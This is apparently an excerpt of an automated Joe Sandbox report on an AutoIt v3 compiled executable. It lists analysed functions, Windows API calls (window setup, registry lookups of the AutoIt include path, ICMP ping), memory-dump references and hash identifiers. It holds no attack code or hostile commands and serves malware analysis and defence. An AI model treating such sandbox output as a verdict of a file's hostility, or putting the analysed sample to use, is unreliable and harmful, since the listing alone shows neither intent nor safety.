                                                                        • Opcode Fuzzy Hash: e9190d870ceb0090d92ad782eb09280349806ea85adbccbf3feb508b00d3326a
                                                                        • Instruction Fuzzy Hash: 9022EE75E08256CFDB24DF55C880BAEB7F0FF45310F14806AE8869B351D3B4A984EBA1
                                                                        Function 00FEBC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • timeGetTime.WINMM ref: 00FEBF57
                                                                          • Part of subcall function 00FE52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FE52E6
                                                                        • Sleep.KERNEL32(0000000A,?,?), ref: 010236B5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePeekSleepTimetime
                                                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                                        • API String ID: 1792118007-922114024
                                                                        • Opcode ID: 5927c41c4ae4592ee33692a3dfd27b58051083316100822381195211ffa974a1
                                                                        • Instruction ID: 6c953ea69cc1e3363bd12a81219463fc7fed72db775a97b8e10325f9f54c9fe9
                                                                        • Opcode Fuzzy Hash: 5927c41c4ae4592ee33692a3dfd27b58051083316100822381195211ffa974a1
                                                                        • Instruction Fuzzy Hash: 2BC2C070A08391DFD724DF25C844BAABBE5BF84304F14891DF5CA9B291CB79E845DB82
                                                                        Function 00FE33E8 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71windowregistryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00FE3444
                                                                        • RegisterClassExW.USER32(00000030), ref: 00FE346E
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FE347F
                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00FE349C
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FE34AC
                                                                        • LoadIconW.USER32(000000A9), ref: 00FE34C2
                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FE34D1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                        • API String ID: 2914291525-1005189915
                                                                        • Opcode ID: c1028778e28796c85649e74780fa3c624a799305c9097f64fd08763de4ae9fee
                                                                        • Instruction ID: eacb944c22c06d90d6025c856d23146cd8aa5b35723ee5fa0fc00d27c8fe01aa
                                                                        • Opcode Fuzzy Hash: c1028778e28796c85649e74780fa3c624a799305c9097f64fd08763de4ae9fee
                                                                        • Instruction Fuzzy Hash: 9A312B71D41309EFDB61DFA4D885AC9BBF0FB0A320F10825AF590E6294E7BA0545CF91
                                                                        Function 00FE3411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00FE3444
                                                                        • RegisterClassExW.USER32(00000030), ref: 00FE346E
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FE347F
                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00FE349C
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FE34AC
                                                                        • LoadIconW.USER32(000000A9), ref: 00FE34C2
                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FE34D1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                        • API String ID: 2914291525-1005189915
                                                                        • Opcode ID: 454bf5a86de4c682937ec3eb810a98647d28dd80295060da25037796178a923a
                                                                        • Instruction ID: 9b52f8ba319158a80d79cffafd94820fa708c347681a9e5b4bff1e3e92f9ac8c
                                                                        • Opcode Fuzzy Hash: 454bf5a86de4c682937ec3eb810a98647d28dd80295060da25037796178a923a
                                                                        • Instruction Fuzzy Hash: 0921F4B1D40309AFDB20DFA4E889B9DBBF4FB09710F00821AF590A6288D7BA0544CF95
                                                                        Function 00FF2FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 010000CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00FF3094), ref: 010000ED
                                                                          • Part of subcall function 010008C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00FF309F), ref: 010008E3
                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FF30E2
                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 010301BA
                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 010301FB
                                                                        • RegCloseKey.ADVAPI32(?), ref: 01030239
                                                                        • _wcscat.LIBCMT ref: 01030292
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                        • API String ID: 2673923337-2727554177
                                                                        • Opcode ID: cca48e34c9a222189ce9642d3c80b50640d2ef6293aafab00468e32d51726bd4
                                                                        • Instruction ID: fe4e1e11d18d2a21a47eac1a21818dd6a95cf472fb690ff82517cdc2b2be4520
                                                                        • Opcode Fuzzy Hash: cca48e34c9a222189ce9642d3c80b50640d2ef6293aafab00468e32d51726bd4
                                                                        • Instruction Fuzzy Hash: 7A71AB71409B059ED324EF65E8818BBBBE8FF94340F80852EF5C5C72A4EB359948CB52
                                                                        Function 00FF514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00FF5156
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00FF5165
                                                                        • LoadIconW.USER32(00000063), ref: 00FF517C
                                                                        • LoadIconW.USER32(000000A4), ref: 00FF518E
                                                                        • LoadIconW.USER32(000000A2), ref: 00FF51A0
                                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FF51C6
                                                                        • RegisterClassExW.USER32(?), ref: 00FF521C
                                                                          • Part of subcall function 00FE3411: GetSysColorBrush.USER32(0000000F), ref: 00FE3444
                                                                          • Part of subcall function 00FE3411: RegisterClassExW.USER32(00000030), ref: 00FE346E
                                                                          • Part of subcall function 00FE3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FE347F
                                                                          • Part of subcall function 00FE3411: InitCommonControlsEx.COMCTL32(?), ref: 00FE349C
                                                                          • Part of subcall function 00FE3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FE34AC
                                                                          • Part of subcall function 00FE3411: LoadIconW.USER32(000000A9), ref: 00FE34C2
                                                                          • Part of subcall function 00FE3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FE34D1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                        • String ID: #$0$AutoIt v3
                                                                        • API String ID: 423443420-4155596026
                                                                        • Opcode ID: a95133dd97e5e6f10e99c5ad39f06a4413473048a2b0b1b1ea6aaa8dc7cf690f
                                                                        • Instruction ID: 80e60d567b6e0c31a5ee07b236fba092d6c732733bea6548d5db458eeeaf713c
                                                                        • Opcode Fuzzy Hash: a95133dd97e5e6f10e99c5ad39f06a4413473048a2b0b1b1ea6aaa8dc7cf690f
                                                                        • Instruction Fuzzy Hash: E8217C71E00708AFEB259FA4ED09B9D7BB4FB08710F40825AF684A6298D3BB5550DF84
                                                                        Function 01055E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • WSAStartup.WS2_32(00000101,?), ref: 01055E7E
                                                                        • inet_addr.WSOCK32(?,?,?), ref: 01055EC3
                                                                        • gethostbyname.WS2_32(?), ref: 01055ECF
                                                                        • IcmpCreateFile.IPHLPAPI ref: 01055EDD
                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 01055F4D
                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 01055F63
                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 01055FD8
                                                                        • WSACleanup.WSOCK32 ref: 01055FDE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                        • String ID: Ping
                                                                        • API String ID: 1028309954-2246546115
                                                                        • Opcode ID: 0fe3275aac5bfee9af57bc2b6a775b6df7b0b1693cec3e16aadd022f6be19dd8
                                                                        • Instruction ID: 093e5e7654d11767ac9b35736e231612a8d21c2a2042440db37cb0249d726f7f
                                                                        • Opcode Fuzzy Hash: 0fe3275aac5bfee9af57bc2b6a775b6df7b0b1693cec3e16aadd022f6be19dd8
                                                                        • Instruction Fuzzy Hash: BC515E316042019FD7A1DF25DC49B2BBBE4EF88720F044569FAD9EB2A1DB74E900DB52
                                                                        Function 00FF4D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 767 ff4d83-ff4dd1 769 ff4dd3-ff4dd6 767->769 770 ff4e31-ff4e33 767->770 772 ff4dd8-ff4ddf 769->772 773 ff4e37 769->773 770->769 771 ff4e35 770->771 774 ff4e1a-ff4e22 DefWindowProcW 771->774 777 ff4ead-ff4eb5 PostQuitMessage 772->777 778 ff4de5-ff4dea 772->778 775 10309c2-10309f0 call fec460 call fec483 773->775 776 ff4e3d-ff4e40 773->776 780 ff4e28-ff4e2e 774->780 811 10309f5-10309fc 775->811 782 ff4e65-ff4e8c SetTimer RegisterWindowMessageW 776->782 783 ff4e42-ff4e43 776->783 781 ff4e61-ff4e63 777->781 784 1030a35-1030a49 call 1042cce 778->784 785 ff4df0-ff4df2 778->785 781->780 782->781 786 ff4e8e-ff4e99 CreatePopupMenu 782->786 791 1030965-1030968 783->791 792 ff4e49-ff4e5c KillTimer call ff5ac3 call fe34e4 783->792 784->781 803 1030a4f 784->803 787 ff4df8-ff4dfd 785->787 788 ff4eb7-ff4ec1 call ff5b29 785->788 786->781 793 1030a1a-1030a21 787->793 794 ff4e03-ff4e08 787->794 805 ff4ec6 788->805 798 103096a-103096c 791->798 799 103099e-10309bd MoveWindow 791->799 792->781 793->774 809 1030a27-1030a30 call 1038854 793->809 801 ff4e0e-ff4e14 794->801 802 ff4e9b-ff4eab call ff5bd7 794->802 806 103096e-1030971 798->806 807 103098d-1030999 SetFocus 798->807 799->781 801->774 801->811 802->781 803->774 805->781 806->801 812 1030977-1030988 call fec460 806->812 807->781 809->774 811->774 816 1030a02-1030a15 call ff5ac3 call ff59d3 811->816 812->781 816->774
                                                                        APIs
                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00FF4E22
                                                                        • KillTimer.USER32(?,00000001), ref: 00FF4E4C
                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FF4E6F
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FF4E7A
                                                                        • CreatePopupMenu.USER32 ref: 00FF4E8E
                                                                        • PostQuitMessage.USER32(00000000), ref: 00FF4EAF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                        • String ID: TaskbarCreated
                                                                        • API String ID: 129472671-2362178303
                                                                        • Opcode ID: 1aeb15143a23cfa0a3a6131d21800860da8531781cecc732dcf9dbca48c68795
                                                                        • Instruction ID: 9e0441ad9fa2d4b63f572e14a3d7ad232a08ab7a320c23e22d963f199857baf9
                                                                        • Opcode Fuzzy Hash: 1aeb15143a23cfa0a3a6131d21800860da8531781cecc732dcf9dbca48c68795
                                                                        • Instruction Fuzzy Hash: FF412932A4050EABEB355F68DC09B7F7699FF81310F40421AF7C1921A9DA7BA810F761
                                                                        Function 00FF56F8 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117windowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 01030C5B
                                                                          • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
                                                                        • _memset.LIBCMT ref: 00FF5787
                                                                        • _wcscpy.LIBCMT ref: 00FF57DB
                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FF57EB
                                                                        • __swprintf.LIBCMT ref: 01030CD1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                                        • String ID: Line %d: $AutoIt - $E#E#
                                                                        • API String ID: 230667853-1317277412
                                                                        • Opcode ID: 9041e83b7843873d7435f52d3c6ade67852d22bd3735c3197a4900c2b6ea927c
                                                                        • Instruction ID: eb6e004205882586ff6ddc67e6ba8bf4a6964e9049c12f31c5e5c4101f47ec5d
                                                                        • Opcode Fuzzy Hash: 9041e83b7843873d7435f52d3c6ade67852d22bd3735c3197a4900c2b6ea927c
                                                                        • Instruction Fuzzy Hash: D441C3B2504309AAD331EB60DC85FEF77DCAF84350F00462EF2C5921A5EB79A648D796
                                                                        Function 01009D16 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • __init_pointers.LIBCMT ref: 01009D16
                                                                          • Part of subcall function 010033B7: EncodePointer.KERNEL32(00000000), ref: 010033BA
                                                                          • Part of subcall function 010033B7: __initp_misc_winsig.LIBCMT ref: 010033D5
                                                                          • Part of subcall function 010033B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0100A0D0
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0100A0E4
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0100A0F7
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0100A10A
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0100A11D
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0100A130
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0100A143
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0100A156
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0100A169
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0100A17C
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0100A18F
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0100A1A2
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0100A1B5
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0100A1C8
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0100A1DB
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0100A1EE
                                                                        • __mtinitlocks.LIBCMT ref: 01009D1B
                                                                        • __mtterm.LIBCMT ref: 01009D24
                                                                          • Part of subcall function 01009D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,01009D29,01007EFD,0109CD38,00000014), ref: 01009E86
                                                                          • Part of subcall function 01009D8C: _free.LIBCMT ref: 01009E8D
                                                                          • Part of subcall function 01009D8C: DeleteCriticalSection.KERNEL32(010A0C00,?,?,01009D29,01007EFD,0109CD38,00000014), ref: 01009EAF
                                                                        • __calloc_crt.LIBCMT ref: 01009D49
                                                                        • __initptd.LIBCMT ref: 01009D6B
                                                                        • GetCurrentThreadId.KERNEL32 ref: 01009D72
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                        • String ID:
                                                                        • API String ID: 3567560977-0
                                                                        • Opcode ID: 06d5812876377467366c94c4dddb38f19944c6b2df1899d2165253f9bfe66be5
                                                                        • Instruction ID: 1605751ab00938cf75839a10246a86a5183e722ac42eb7674443984c3cd2d759
                                                                        • Opcode Fuzzy Hash: 06d5812876377467366c94c4dddb38f19944c6b2df1899d2165253f9bfe66be5
                                                                        • Instruction Fuzzy Hash: C9F0CD32A997125AF6777B78BC026CA2AC4DB62638F20425AF1D8D60C7EF1180400290
                                                                        Function 00FF50DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1084 ff50db-ff514b CreateWindowExW * 2 ShowWindow * 2
                                                                        APIs
                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FF5109
                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FF512A
                                                                        • ShowWindow.USER32(00000000), ref: 00FF513E
                                                                        • ShowWindow.USER32(00000000), ref: 00FF5147
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CreateShow
                                                                        • String ID: AutoIt v3$edit
                                                                        • API String ID: 1584632944-3779509399
                                                                        • Opcode ID: 8ff4f5e782890f00e733a38fa988d6fcaf06553d67fc6b4ad482900fe90978bc
                                                                        • Instruction ID: 8d4e35fe2a59596981fe088807c9f1b83eca00fe3f0f657d534cf94246d00165
                                                                        • Opcode Fuzzy Hash: 8ff4f5e782890f00e733a38fa988d6fcaf06553d67fc6b4ad482900fe90978bc
                                                                        • Instruction Fuzzy Hash: ADF05E71A402947EEA311623AC0CE373E7DE7C7F50F40821EB940A2158C67B1840CBB0
                                                                        Function 01049B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00FF4A8C: _fseek.LIBCMT ref: 00FF4AA4
                                                                          • Part of subcall function 01049CF1: _wcscmp.LIBCMT ref: 01049DE1
                                                                          • Part of subcall function 01049CF1: _wcscmp.LIBCMT ref: 01049DF4
                                                                        • _free.LIBCMT ref: 01049C5F
                                                                        • _free.LIBCMT ref: 01049C66
                                                                        • _free.LIBCMT ref: 01049CD1
                                                                          • Part of subcall function 01002F85: RtlFreeHeap.NTDLL(00000000,00000000,?,01009C54,00000000,01008D5D,010059C3), ref: 01002F99
                                                                          • Part of subcall function 01002F85: GetLastError.KERNEL32(00000000,?,01009C54,00000000,01008D5D,010059C3), ref: 01002FAB
                                                                        • _free.LIBCMT ref: 01049CD9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                        • String ID: >>>AUTOIT SCRIPT<<<
